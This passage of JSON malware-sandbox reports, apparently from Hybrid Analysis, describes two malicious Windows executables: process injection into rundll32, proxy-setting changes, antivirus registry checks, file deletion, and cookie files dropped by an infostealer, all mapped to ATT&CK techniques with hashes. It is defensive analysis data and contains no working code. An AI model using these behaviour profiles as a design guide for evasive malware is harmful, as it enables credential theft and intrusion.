\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-61", "type": 2, "relevance": 10, "name": "Found an instant messenger related domain", "description": "\"hotwire.com\" (Indicator: \"wire.com\")\n \"blackberry.com\" (Indicator: \"blackberry.com\")", "origin": "File/Memory"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-131", "type": 1, "relevance": 5, "name": "Contains ability to retrieve the fully qualified path of module", "description": "GetModuleFileNameA@KERNEL32.dll at 13525-109-00405440\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00000892-16261-58-00406A30\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00000892-16261-62-004050F0\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00000892-16261-38-00405440\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00000892-16261-45-00407100\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00000892-16261-59-00407210", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-118", "type": 1, "relevance": 3, "name": "Contains ability to retrieve the command-line string for the current process", "description": "GetCommandLineA@KERNEL32.DLL at 00000000-00000892-16261-58-00406A30", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"rundll32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\IEXPLORE.EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\IEXPLORE .EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\internat.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\IEXPLORE.EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\IEXPLORE .EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\mssysint.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\mspsint.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\mspbint.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\mspbbase.dll\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\mspbhook.dll\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\psinthk.dll\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\psintbs.dll\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\¢®.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\notepad¢®.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\¢«.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\system32\\notepad¢¬.exe\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\INTERNAT.EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\System32\\IEXPLORE.EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\System32\\IEXPLORE .EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\System32\\MSSYSINT.EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\System32\\MSPSINT.EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\System32\\MSPBINT.EXE\" with delete access\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"C:\\Windows\\System32\\MSPBBASE.DLL\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"WinExec\" with parameter %WINDIR%\\system\\rundll32.exe (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" wrote 1500 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" allocated memory in \"C:\\5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-32", "type": 3, "relevance": 8, "name": "Reads Antivirus engine related registry keys", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")", "origin": "Registry Access", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"rundll32.exe\" connects to <IPv4>:80", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-248", "type": 9, "relevance": 6, "name": "Detected Rundll32 execution with no parameters provided (likely process injection)", "description": "Process \"rundll32.exe\" with commandline \"\" [UID: 00000000-00005204]", "origin": "Monitored Target", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda
https://hybrid-analysis.com/sample/ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda
Hybrid Analysis - Infostealers
{"size": 63049, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda", "sha256": "ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda", "av_detect": 91, "vx_family": "Dacic.1A7FA519.A.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 2, "total_processes": 4, "total_signatures": 160, "extracted_files": [{"name": "7W4OOVRO.txt", "file_path": "%APPDATA%\\Microsoft\\Windows\\Cookies\\7W4OOVRO.txt", "file_size": 225, "sha256": "375759857dabcb126644062f3e566801a7a934130a4be78f7931b92dcd8dcf97", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "ewiuer2.exe (PID: 4444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "JAPOZOO9.txt", "file_path": "%APPDATA%\\Microsoft\\Windows\\Cookies\\JAPOZOO9.txt", "file_size": 224, "sha256": "2a42706b692552058b9a06670f425361b62e62a5293d567794c89e53818d4547", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "ewiuer2.exe (PID: 4444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "KE4KSO93.txt", "file_path": "%APPDATA%\\Microsoft\\Windows\\Cookies\\KE4KSO93.txt", "file_size": 144, "sha256": "ae147947f56938668f438fef2a9b563ff6096bc43ebc37321f004da0841a5222", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "ewiuer2.exe (PID: 3444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "N1W0UPWY.txt", "file_path": "%APPDATA%\\Microsoft\\Windows\\Cookies\\N1W0UPWY.txt", "file_size": 226, "sha256": "b9245b7219fa458fc3a217fb1d45531d5079225a68bef292e5bc141294876d65", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "ewiuer2.exe (PID: 4444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ewiuer2.exe", "file_path": "%APPDATA%\\ewiuer2.exe", "file_size": 63049, "sha256": "e5dfb0fef67c097b8fb59553816b6b57434e76c746392d53ad7442493468735c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "ewiuer2.exe (PID: 4444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ewiuer2.exe", "file_path": "%WINDIR%\\System32\\ewiuer2.exe", "file_size": 63049, "sha256": "b93bb8f50fe8b6460bde972259250b1c0b36d09fe956ce17184c47cbfb134c18", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "ewiuer2.exe (PID: 4444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "viesazm.mpk", "file_path": "%WINDIR%\\System32\\viesazm.mpk", "file_size": 100, "sha256": "84238281e3c74a75381c4fc3983ed0d395916d1bf2378a0a7626823cf6f9d690", "type_tags": ["data"], "description": "data", "runtime_process": "ewiuer2.exe (PID: 5220)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "EWIUER2.EXE.67A482B6.bin", "file_size": 63049, "sha256": "b93bb8f50fe8b6460bde972259250b1c0b36d09fe956ce17184c47cbfb134c18", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 8.00 (Visual Studio 2005) (build: 50727)", "10 .CPP Files (with LTCG) compiled with CL.EXE 14.00 (Visual Studio 2005) (build: 50727)"], "imported_objects": ["19 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 4035)", "4 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 4035)", "13 .C Files compiled with CL.EXE 14.00 (Visual Studio 2005) (build: 50727)", "12 .ASM Files assembled with MASM 8.00 (Visual Studio 2005) (build: 50727)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a small codebase (10 files)"], "total_file_compositions_imports": 112}, "processes": [{"uid": "00000000-00003168", "name": "ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe", "normalized_path": "C:\\ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe", "sha256": "ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda"}, {"uid": "00000000-00003444", "parentuid": "00000000-00003168", "name": "ewiuer2.exe", "normalized_path": "%APPDATA%\\ewiuer2.exe", "sha256": "e5dfb0fef67c097b8fb59553816b6b57434e76c746392d53ad7442493468735c"}, {"uid": "00000000-00004444", "parentuid": "00000000-00003444", "name": "ewiuer2.exe", "normalized_path": "%WINDIR%\\System32\\ewiuer2.exe", "sha256": "b93bb8f50fe8b6460bde972259250b1c0b36d09fe956ce17184c47cbfb134c18"}, {"uid": "00000000-00005220", "parentuid": "00000000-00004444", "name": "ewiuer2.exe", "normalized_path": "%WINDIR%\\System32\\ewiuer2.exe", "command_line": "/nomove", "sha256": "b93bb8f50fe8b6460bde972259250b1c0b36d09fe956ce17184c47cbfb134c18"}], "mitre_attcks": [{"tactic": "Reconnaissance", "technique": "IP Addresses", "attck_id": "T1590.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Gather Victim Network Information", "attck_id": "T1590", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590"}}, {"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "JavaScript", "attck_id": "T1059.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/007", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", 